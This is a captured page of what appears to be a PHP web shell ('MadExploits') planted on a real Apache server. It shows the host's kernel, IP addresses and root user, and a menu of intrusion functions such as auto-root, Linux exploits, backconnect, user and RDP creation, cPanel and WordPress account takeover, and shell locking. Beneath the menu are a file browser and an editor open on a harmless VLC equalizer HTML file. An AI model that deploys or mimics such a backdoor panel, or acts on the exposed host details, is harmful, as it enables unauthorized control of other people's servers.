Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.130
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
vlc /
lua /
http /
dialogs /
[ HOME SHELL ]
Name
Size
Permission
Action
batch_window.html
857
B
-rw-r--r--
browse_window.html
1.15
KB
-rw-r--r--
create_stream.html
14.13
KB
-rw-r--r--
equalizer_window.html
1.25
KB
-rw-r--r--
error_window.html
482
B
-rw-r--r--
mosaic_window.html
4.82
KB
-rw-r--r--
offset_window.html
1.82
KB
-rw-r--r--
stream_config_window.html
1.23
KB
-rw-r--r--
stream_window.html
4.06
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : equalizer_window.html
<script type="text/javascript"> //<![CDATA[ var bands = new Array('60Hz','170Hz','310Hz','600Hz','1kHz','3kHz','6kHz','12kHz','14kHz','16kHz'); $(function(){ $('#window_equalizer').dialog({ autoOpen: false, height: 650, width: 500, resizable: false, buttons:{ "<?vlc gettext("Reset") ?>":function(){ $('.eqBand').each(function(){ $(this).slider('value',0); sendEQCmd({ command:'equalizer', val: 0, band: $(this).attr('id').substr(2) }) }); }, "<?vlc gettext("Close") ?>":function(){ $(this).dialog("close"); } } }); $('#preamp').slider({ min: -20, max: 20, step: 0.1, range: "min", animate: true, stop: function(event,ui){ $('#preamp_txt').empty().append(ui.value+'dB'); sendEQCmd({ command:'preamp', val: ui.value }) }, slide: function(event,ui){ $('#preamp_txt').empty().append(ui.value+'dB'); } }); }); //]]> </script> <div id="window_equalizer" title="<?vlc gettext("Graphical Equalizer") ?>"> <div style="margin: 5px 5px 5px 5px;"> <div><?vlc gettext("Preamp:") ?> <span id="preamp_txt">0dB</span></div> </div> <div style="margin: 5px 5px 10px 5px;"> <div id="preamp" style="font-size: 18px;"></div> </div> </div>
Close